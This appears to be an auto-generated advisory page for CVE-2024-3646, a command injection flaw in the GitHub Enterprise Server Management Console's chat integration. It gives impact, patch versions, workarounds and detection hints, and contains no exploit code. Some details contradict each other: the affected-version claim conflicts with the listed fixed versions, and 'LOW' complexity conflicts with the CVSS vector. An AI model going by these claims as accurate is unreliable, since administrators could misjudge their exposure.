CVE-2024-3646 – A command injection vulnerability in GitHub Ent... (How to Fix)

Q: What is the severity of CVE-2024-3646?

CVE-2024-3646 has a CVSS score of 8.0 (HIGH). A command injection vulnerability in GitHub Enterprise Server allows attackers with editor role access to the Management Console to execute arbitrary commands and gain admin SSH access when configuring chat integration. This affects all GitHub Enterprise Server instances prior to version 3.12. The vulnerability requires authenticated access to the Management Console with editor privileges.

📋 TL;DR

A command injection vulnerability in GitHub Enterprise Server allows attackers with editor role access to the Management Console to execute arbitrary commands and gain admin SSH access when configuring chat integration. This affects all GitHub Enterprise Server instances prior to version 3.12. The vulnerability requires authenticated access to the Management Console with editor privileges.

💻 Affected Systems

Products:

GitHub Enterprise Server

Versions: All versions prior to 3.12

Operating Systems: Linux (GitHub Enterprise Server appliance)

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability is present in default configurations when chat integration is configured via Management Console.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the GitHub Enterprise Server instance with admin SSH access, allowing data exfiltration, code manipulation, and persistent backdoor installation.

🟠

Likely Case

Unauthorized admin access leading to repository manipulation, user account compromise, and potential lateral movement within the enterprise network.

🟢

If Mitigated

Limited impact due to restricted Management Console access and proper role-based access controls preventing editor role assignment to untrusted users.

🌐 Internet-Facing: MEDIUM - While the Management Console may be internet-accessible, exploitation requires specific editor role credentials.

🏢 Internal Only: HIGH - Internal attackers with legitimate editor access or compromised credentials can exploit this to gain admin privileges.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to Management Console with editor role. No public exploit code available at this time.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.12.2, 3.11.8, 3.10.10, or 3.9.13

Vendor Advisory: https://docs.github.com/en/enterprise-server/admin/release-notes

Restart Required: Yes

Instructions:

1. Backup your GitHub Enterprise Server instance. 2. Download the appropriate patch version from GitHub Enterprise downloads. 3. Follow the upgrade instructions for your version. 4. Restart the instance after upgrade completion.

🔧 Temporary Workarounds

Restrict Management Console Access

all

Limit Management Console access to only trusted administrators and remove editor roles from potentially compromised accounts.

Disable Chat Integration

all

Remove or disable chat integration configuration in Management Console to eliminate the attack vector.

🧯 If You Can't Patch

Implement strict access controls for Management Console and regularly audit editor role assignments.
Monitor SSH access logs for unusual admin activity and implement network segmentation for GitHub Enterprise Server.

🔍 How to Verify

Check if Vulnerable:

Check your GitHub Enterprise Server version via Management Console or SSH. If version is below 3.12, you are vulnerable.

Check Version:

ssh admin@your-ghes-instance 'ghes-version' or check in Management Console under Support > Version

Verify Fix Applied:

After patching, verify version is 3.12.2, 3.11.8, 3.10.10, or 3.9.13. Test chat integration configuration to ensure no command injection occurs.

📡 Detection & Monitoring

Log Indicators:

Unusual SSH login attempts from Management Console IPs
Chat integration configuration changes followed by admin SSH access
Command execution patterns in application logs

Network Indicators:

Unexpected SSH connections from GitHub Enterprise Server to internal systems
Anomalous outbound connections after chat integration changes

SIEM Query:

source="github-enterprise" AND (event="ssh_login" AND user="admin") OR (event="management_console" AND action="chat_integration_update")

📊 Metadata

CVE ID: CVE-2024-3646

CVSS v3 Score: 8.0 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE: CWE-20

Published: April 19, 2024

Last Updated: September 2, 2025

🔗 References

https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.10 Release Notes
https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.8 Release Notes
https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.2 Release Notes
https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.13 Release Notes
https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.10 Release Notes
https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.8 Release Notes
https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.2 Release Notes
https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.13 Release Notes

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-3646, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Enterprise Server by Github

Enterprise Server by Github

Enterprise Server by Github

Enterprise Server by Github

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Restrict Management Console Access

Disable Chat Integration

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities